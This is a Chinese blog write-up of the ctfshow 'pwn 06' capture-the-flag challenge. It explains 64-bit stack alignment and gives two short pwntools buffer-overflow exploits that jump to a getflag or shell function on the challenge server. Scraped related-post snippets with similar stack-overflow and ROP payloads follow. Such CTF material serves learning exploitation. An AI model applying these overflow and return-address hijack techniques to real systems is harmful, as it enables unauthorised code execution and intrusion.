ctfshow pwn 06

已于 2023-04-14 10:42:29 修改
阅读量344 收藏 1
点赞数 3
文章标签: 网络安全 安全 系统安全 安全威胁分析 安全架构
于 2023-04-14 10:15:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/A2247328295/article/details/130146561
版权

堆栈平衡

在调用函数时,保证esp能正确恢复入栈之前的状态
推荐文章
堆栈平衡

PWN 06

可以看到这是一个64位的程序,需要考虑堆栈平衡
在这里插入图片描述
welcome函数和main函数就不看了,直接看getflag函数
在这里插入图片描述
这里需要将payload的先指向retn的地址维持堆栈平衡,最后添加函数的首地址,64位的用cyclic计算偏移的时候地址用后8位,记得加0x
在这里插入图片描述

exp

from pwn import *
p = remote("pwn.challenge.ctf.show",28103)
payload = b'a'*(0xc+8) + p64(0x40058E) + p64(0x400577)
p.sendline(payload)
p.interactive()

exp很简单就不解释了,当然这里还可以这样实现,我们直接将地址指向 bin/sh

exp2

from pwn import *
p = remote("pwn.challenge.ctf.show",28103)
payload = b'a'*(0xc+8) + p64(0x400578)
p.sendline(payload)
p.interactive()
czjtzdbk
关注
ctfshow pwn
zip471642048的博客
06-04 626
ctfshow pwn系列
ctfshow pwn wp
Chandra的学习之路
11-26 938
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
ctfshow pwn6
qq_39980610的博客
08-22 568
函数栈平衡:保证函数调用前后的栈顶是一致的。所以exp基本一样但是要注意栈平衡。其实就是要进出都是esp(32位)已经提示了是pwn05的64位版。1.外平栈:由函数外部保持栈平衡。2.内平栈:由函数内部保持栈平衡。或者简单理解为函数要正确退出。
PWN-PRACTICE-CTFSHOW-6
P1umH0的博客
01-18 1912
PWN-PRACTICE-CTFSHOW-636D杯-MengxinStack36D杯-tang1024杯-1024_happy_stack1024杯-1024_happy_checkin 36D杯-MengxinStack 程序开了canary和PIE保护 泄露远程libc版本,为 libc6_2.23-0ubuntu10_amd64.so from pwn import * io=remote("pwn.challenge.ctf.show",28124) io.recvuntil("She said:
CTFshow-PWN-前置基础(pwn6-pwn9)
Welcome To Myon'Blog !
04-15 784
立即寻址方式结束后eax寄存器的值为?截取关键代码mov 用于赋值,将右边立即数加载到左边的寄存器 eax 中;add 将寄存器 eax 中的值与立即数 114504 相加,并将结果存储回寄存器eax中;sub 从寄存器eax中的值中减去1,并将结果存储回寄存器eax中。
CTFshow-webPWN
i_kei的博客
11-10 623
WEBpwn_1 将组件放置成如图所示 通电即可获得flag WEBpwn_2 将组件放置成如图所示 通电即可获得flag
ctfshow pwn4
qq_39980610的博客
08-22 792
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow pwn7
qq_39980610的博客
08-22 618
pwn7
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6689
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
CTF PWN入坑
Alan-WalkBill的博客
11-17 3340
CTF PWN入门(一) 1.攻防世界get_shell 将下载好的附件用在Linux中打开命令是./ 文件名 发现没有权限,原来需要先添加权限可使用chmod +x ./ 文件名。 然后nc -nv 111.198.29.45 55973链接到远程主机 ***更多chmod介绍https://www.cnblogs.com/peida/archive/2012/11/29/2794010.htm...
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3994
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
pwn06(关于64位程序堆栈平衡的处理)
Welcome To Myon'Blog !
07-07 1817
堆栈平衡: 当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。
ctfshow 基础pwn wp
n1ptune__的博客
05-29 807
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
ctfshow做题笔记-前置基础-pwn5~pwn12
Yilanchia的博客
01-22 315
前言前言堆了很一段时间没有写笔记,巩固一下学到的知识。一、pwn5只需要运行就OK二、pwn6(立即寻址)学到一个小操作:在ida中打开二进制文件后,遇到13进制数点击16进制数按快捷键H换为10进制数(回到16进制按Q,2进制按B)三、pwn7(寄存器寻址)四、pwn8(直接寻址)知识点:直接寻址是指通过一个具体的内存地址直接访问内存中的数据。在这种寻址模式下,地址直接指定目标数据的位置,无需额外的计算或间接引用。得到值为636C6557h五、pwn9(寄存器间接寻址)
CTFshow-pwn入门-前置基础pwn5 - pwn12
你们de4月天的博客
06-17 1584
CTFshow-pwn入门-前置基础-pwn5-pwn12
ctfshow-pwn新手系列
热门推荐
ro4lsc的博客
06-14 1万+
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFSHOW 36D杯CTF(pwn部分wp)
weixin_44296844的博客
05-04 2038
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8667
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
[pwn] 6.ROP练习
H4ppyD0g的博客
09-01 403
文章目录pwn0pwn1pwn2pwn2_x64pwn3pwn3_x64 pwn0 经典ret2text,不过是64位程序,覆盖ebp需要8个字节。 from pwn import * elf = ELF('./level0') callsys_addr = elf.symbols['callsystem'] io = process('./level0') io.recvuntil(b'World\n') payload = cyclic(0x80 + 0x8) + p64(0x0000000000
ctfshow pwn5
最新发布
03-11
### CTFShow Pwn5 Challenge 解决方案 对于CTFShow平台上的Pwn5挑战题,通常涉及利用二进制漏洞来执行任意代码或者获得shell访问权限。基于提供的参考资料[^4],可以推测该题目可能涉及到栈溢出攻击以及返回地址操控。 #### 可能的技术细节 - **环境设置** 使用`pwntools`库来进行本地调试和远程连接测试目标程序。通过指定架构为AMD64位模式,并加载ELF文件以解析符号表中的函数位置。 ```python from pwn import * context.arch = "amd64" io = process('pwn06') elf = ELF('pwn06') ``` - **关键点分析** 题目中提到的关键操作包括定位到特定的`getFlag()`函数入口地址,这通常是获取flag字符串所必需的操作之一;另外还定义了一个名为`ret`的偏移量用于构建ROP链(Return-Oriented Programming Chain),这是一种绕过现代保护机制的方法。 - **Payload 构造** 利用`flat()`方法组合多个参数形成最终发送给服务器的数据包。这里包含了循环填充字符(`cyclic`)作为占位符,随后跟随着之前计算好的返回地址(`ret`)与目标函数指针(`getFlag`)。 ```python payload = flat([ cyclic(0x14), ret, getFlag ]) ``` - **交互处理** 发送构造完成后的载荷至服务端,并开启互动模式等待响应结果。 ```python io.sendline(payload) io.interactive() ``` 上述过程展示了如何针对此类问题设计解决方案框架,但具体实现还需根据实际比赛情况调整优化策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值